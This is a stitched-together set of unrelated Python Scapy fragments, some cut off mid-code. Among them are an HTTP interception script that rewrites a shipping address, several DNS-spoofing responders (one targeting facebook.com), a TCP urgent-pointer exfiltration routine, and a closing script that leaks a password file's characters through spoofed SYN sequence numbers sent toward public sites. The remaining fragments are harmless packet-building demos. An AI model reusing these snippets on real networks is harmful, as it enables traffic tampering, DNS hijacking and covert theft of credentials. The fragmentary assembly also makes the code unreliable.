def print_and_accept(pkt): regex = re.compile("/ex3/shipping") pkt.accept() ip = IP(pkt.get_payload()) if ip["TCP"].dport == 80: if ip.haslayer("Raw"): http = ip["Raw"].load.decode() if regex.search(http): print("HTTP:") print(http) print("\nIP.show():") print(ip.show()) new_msg = json.loads(http.splitlines()[-1]) new_msg["shipping_address"] = "*****@*****.**" ip["Raw"].load = new_msg print("\nIP.show() nr. 2:") print(ip.show()) answer = requests.post("http://com402.epfl.ch/hw1/ex3/shipping", data=json.dumps(new_msg), headers={"Content-Type": "application/json"}) print("\nAnswer code:") print(answer.status_code) print("\nAnswer text:") print(answer.text)
def send_data(self, bytestream): if self.verbose(): print("Exfiltrating " + repr(bytestream.decode('us-ascii'))) packet = IP() / TCP() packet.dst = self.host() packet.dport = self.dest_port() packet.sport = self.source_port() packet.getlayer(TCP).flags = 0x20 | 0x02 # URG & SYN packet.urgptr = self.int_for(bytestream) if self.verbose(): packet.show() send(packet, verbose=self.verbose())
def get_response(pkt: IP): print("XD") if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0): print("XD") if page_name in str(pkt["DNS Question Record"].qname): spf_resp = IP(dst=pkt[IP].src) / UDP( dport=pkt[UDP].sport, sport=53) / DNS( id=pkt[DNS].id, ancount=1, an=DNSRR(rrname=pkt[DNSQR].qname, rdata=FAKE_IP) / DNSRR(rrname=page_name, rdata=FAKE_IP)) spf_resp.show() send(spf_resp, verbose=0, iface=IFACE) return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def modify(packet): pkt = IP(packet.get_payload()) if pkt.qd.qname == b'facebook.com.': print(pkt.show()) p = Ether( dst=self.MacList[0], src=self.LocalMac, type=2048) / IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP( sport=53, dport=pkt[UDP].sport) / DNS( id=pkt[DNS].id, qr=1, qdcount=1, ancount=1, nscount=0, arcount=0, qd=DNSQR( qname=pkt[DNS].qd.qname, qtype=1, qclass=1), an=DNSRR(rrname=pkt[DNS].qd.qname, type=1, rclass=1, rdata=ip), ns=None, ar=None) sendp(p, verbose=0) #packet.set_payload(bytes(str(pkt), 'utf-8')) #set the packet content to our modified version packet.drop() #drop the packet else: packet.accept()
def get_response(pkt: IP): # First check if it is a # DNS request packet if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0): # Init site in banned list # to be False. site_in_list = False # Find out if the site is # in the banned list. for site in website_list: if site in str(pkt["DNS Question Record"].qname): site_in_list = True # If the site is in the banned list # spoof the packet. if site_in_list: # Create a spoofed packet spf_resp = IP( src=DNS_SERVER_IP, dst=pkt[IP].src) / UDP() / DNS(an=DNSRR( rrname=pkt[DNSQR].qname, ttl=299, rdata='127.0.0.1')) # Print for demo purposes print( "******************** SITE IN BANNED LIST *****************" ) print( "****************** SPOOFED PACKET BELOW ******************" ) spf_resp.show() # Send spoofed packet send(spf_resp, verbose=2, iface=IFACE) return f"Spoofed DNS Response Sent: {pkt[IP].src}" else: # Send the real response packet return forward_dns(pkt)
def send(self, packet): original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet if self.verbose > 1: print "Original packet:" original_packet.show() hexdump(str(original_packet)) fragments = fragment(original_packet, fragsize = self.fragment_size) try: i = 1 for frag in fragments: if self.verbose > 1: print "Fragment %d of %d:" % (i, len(fragments)) frag.show() frag = str(frag) length = struct.pack(">I", len(frag)) if not self.sock: print '[+] connecting ...' self.sock = self.create() print '[+] sending part %d of %d now..' % (i, len(fragments)) hexdump(frag) if self.log: self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag) self.sock.send(length) self.sock.send(frag) if self.log: self.log('sent fragment %d of %d' % (i, len(fragments))) i += 1 if self.raw_send: if self.log: self.log('forcing a new connection due to raw_send flag') self.close() except KeyboardInterrupt,e: print "[-] keyboard interrupt while connecting/sending to redirector" raise KeyboardInterrupt,e
def get_response(pkt): if (DNS in pkt and pkt[IP].src != DNS_SERVER_IP and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0): if 'trailers.apple.com' in str(pkt['DNS Question Record'].qname): spoofed = IP(dst=pkt[IP].src)\ /UDP(dport=pkt[UDP].sport, sport=53)\ /DNS(id=pkt[DNS].id, ancount=1, an=DNSRR(rrname=pkt[DNSQR].qname, rdata=DNS_SERVER_IP)) print(spoofed.show()) send(spoofed, verbose=0) return f'Spoofed DNS Response Sent: {spoofed.summary()}' else: return forward_dns(pkt)
class IPLayer(object): """docstring for IPLayer""" """Argument has to a dictionay of python """ def __init__(self, arguments={}): # super(IPLayer, self).__init__() self.packet = None if not isinstance(arguments, dict): return "Please provide a dictionay" self.arguments = arguments def make(self): self.packet = IP() for param in self.arguments: if not hasattr(self.packet, param): continue setattr(self.packet, param, self.arguments[param]) return self def updatePacket(self, arguments={}): if not isinstance(arguments, dict): return "Please provide a dictionay" for param in arguments: if not hasattr(self.packet, param): continue setattr(self.packet, param, arguments[param]) def getPacket(self): return self.packet def show(self): return self.packet.show() def addTCP(self): packet = TCPLayer()._getTCP() self.packet = self.packet / packet return self def prependEther(self): packet = EtherLayer()._getEther() self.packet = packet / self.packet return self def _getIP(): return IP()
import os, sys, struct from select import select from scapy.all import IP from fcntl import ioctl f = os.open("/dev/tap0", os.O_RDWR) try: while 1: r = select([f],[],[])[0][0] if r == f: packet = os.read(f, 4000) # print len(packet), packet ip = IP(packet) ip.show() except KeyboardInterrupt: print "Stopped by user."
#!/usr/bin/python3 # Scapy is a python library that allows us to design, manipulate, intercept and process packets # Scapy sets header fields by default. # Have to be root to run this. from scapy.all import IP, ICMP, sr1, ls ip_layer = IP(src="192.168.0.1", dst="www.google.com") #print(ip_layer.show()) icmp_req = ICMP() # Help to list (ls) details about the layer. print(ls(ip_layer)) print(ip_layer.show()) print(ip_layer.summary()) print(icmp_req.show()) # Add the layers together with / packet = ip_layer / icmp_req #print(packet.show()) received_packet = sr1(packet) if received_packet: print(received_packet.show())
i.src = source_input u = UDP(dport=53) d = DNS(rd=1,qd=DNSQR(qname=query_input)) # Print all information. print "" print "Information" print "===========" print "Source IP : %s" %source_input print "Destination IP: %s" %destination_input print "DNS Query : %s" %query_input print "" print "Package details" print "===============" print "" print i.show() print "" print u.show() print "" print d.show() print "" # Confirmation. is_ok = raw_input("Is it OK? (Y/n)") # Send or exit. if is_ok == "y" or is_ok == "Y" or is_ok == "": p = send(i/u/d) else: print "Bye."
l = logging.getLogger("scapy.runtime") l.setLevel(49) from scapy.all import send, IP, TCP, ICMP, UDP wb = load_workbook(filename=os.getcwd() + "/sample.xlsx") # grab the active worksheet # sheet = wb.active sheet = wb['Test'] for row in sheet.rows: protocol = row[0].value if (protocol == 'ICMP'): a = IP(src=row[1].value, dst=row[2].value, proto=protocolNumber(row[0].value)) / ICMP() / TCP( sport=row[3].value, dport=row[4].value) / "Hello World" a.show() send(a) if (protocol == 'TCP'): a = IP(src=row[1].value, dst=row[2].value, proto=protocolNumber(row[0].value)) / TCP( sport=row[3].value, dport=row[4].value, flags='S', seq=42) / "Hello World" a.show() send(a) if (protocol == 'UDP'): a = IP(src=row[1].value, dst=row[2].value, proto=protocolNumber(row[0].value)) / UDP( sport=row[3].value, dport=row[4].value) / "Hello World" a.show()
import select import time from scapy.all import IP, ICMP from pytun import TunTapDevice, IFF_TAP, IFF_TUN, IFF_NO_PI tun = TunTapDevice(flags=IFF_TUN | IFF_NO_PI, name="FakePing") tun.addr = "10.10.10.1" tun.netmask = '255.255.255.0' tun.up() epoll = select.epoll() epoll.register(tun.fileno(), select.EPOLLIN) while True: while epoll.poll(0): data = tun.read(tun.mtu) packet = IP(data) icmp_part = packet.getlayer(ICMP) if icmp_part is not None: time.sleep(desire_time) respacket = IP(src=packet.dst, dst=packet.src, ttl=desire_ttl) respacket /= ICMP(type=0, seq=icmp_part.seq, id=icmp_part.id) respacket /= icmp_part.payload tun.write(bytes(respacket)) packet.show() respacket.show() time.sleep(0.01)
p=sr(IP(src="192.168.43.55", dst="www.secdev.org")/TCP(sport=RandShort(),dport=[20,21,80,443,3389], flags="S"),inter=0.5,retry=2,timeout=1) #traceroute traceroute(["www.google.com"], maxttl=20) #traceroute con puerto 23 traceroute (["10.1.99.2"],dport=23,maxttl=20) #paquete por capas IP() IP()/TCP() Ether()/IP()/TCP() IP()/TCP()/"GET / HTTP/1.1\r\n\r\n" Ether()/IP(dst="api.tidex.com")/TCP(dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n" Ether()/IP()/IP()/UDP() #armado de paquetes por capas a=Ether(); a.show() b=IP(); b.show() c=TCP(); c.show() d=sr(a/b/c,timeout=2) #enviar paquete por capas ans,unans=sr(IP(dst="api.tidex.com")/TCP(sport=RandShort(),dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n") #############HTTP ##super importante #https://stackoverflow.com/questions/9058052/unwanted-rst-tcp-packet-with-scapy #iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 192.168.43.55 -j DROP load_layer("http") req = HTTP()/HTTPRequest( Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive',
#! /usr/bin/env python from scapy.all import TCP, IP, send import time src_naame = '10.0.2.15' # Enter ip of listener src_port = 666 # Enter port on which listener iss listening i = 0 sn = 70 f = open("/home/MadMaxx/Desktop/psswd.txt", 'r') webs = ['twitter.com', 'google.com', 'reddit.com'] for line in f.readlines(): for c in line: serv = webs[i] ip = IP(dst=serv, src=src_naame) p = sn * 1000 + ord(c) tcp = TCP(sport=src_port, dport=443, flags='S', seq=p) send(ip / tcp) ip.show() tcp.show() time.sleep(0.5) send(ip / TCP(dport=443, flags='F')) sn += 1 if i + 1 == len(webs): i = 0 else: i += 1